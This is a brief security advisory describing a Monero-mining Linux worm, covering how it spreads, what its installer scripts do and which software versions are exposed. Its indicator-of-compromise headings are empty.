A new form of malware has been spotted, the code’s main focus is the fraudulent mining of the Monero (XMR) cryptocurrency.
The worm spreads by attempting to exploit four web application vulnerabilities or by brute forcing Secure Shell (SSH) and Redis database services on the target system using a hardcoded set of credentials. Once the worm is established on the system it downloads and executes three scripts.
The first script contains a set of installation instructions, the second and third scripts contain the code and configuration for the cryptocurrency miner. When the first script executes, it attempts to carry out a series of activities:
- The script attempts to disable security features including SELinux.
- A scheduled job is created that downloads and runs the installation script every fifteen minutes in order to maintain persistence.
- All processes with a CPU usage greater than 30% are killed.
- The script attempts to connect to all known SSH hosts in the directory and execute the payload.
- The cryptocurrency miner is installed and run as a service.
The malware will also block outgoing traffic on ports 3333, 5555, 7777, and 9999, which F5 says is likely due to these ports being used by other cryptocurrency miners.
For further information
Indicators of Compromise
MD5 File Hashes
SHA1 File Hashes
SHA256 File Hashes
Linux servers with one or more of the following enabled or installed:
- Redis Database services – All versions
- ThinkPHP – Versions prior to 3.2.4
- Atlassian Confluence Server and Confluence Data Center:
- Versions prior to 6.6.12
- Versions from 6.7.0 prior to version 6.12.3
- Versions 6.13.0 prior to version 6.13.3
- Version 6.14.0 prior to 6.14.2
- Versions 8.2.x and earlier
- Versions 7.x prior to version 7.58
- Versions 8.3.x prior to version 8.3.9
- Versions 8.4.x prior to version 8.4.6
- Versions 8.5.x prior to version 8.5.1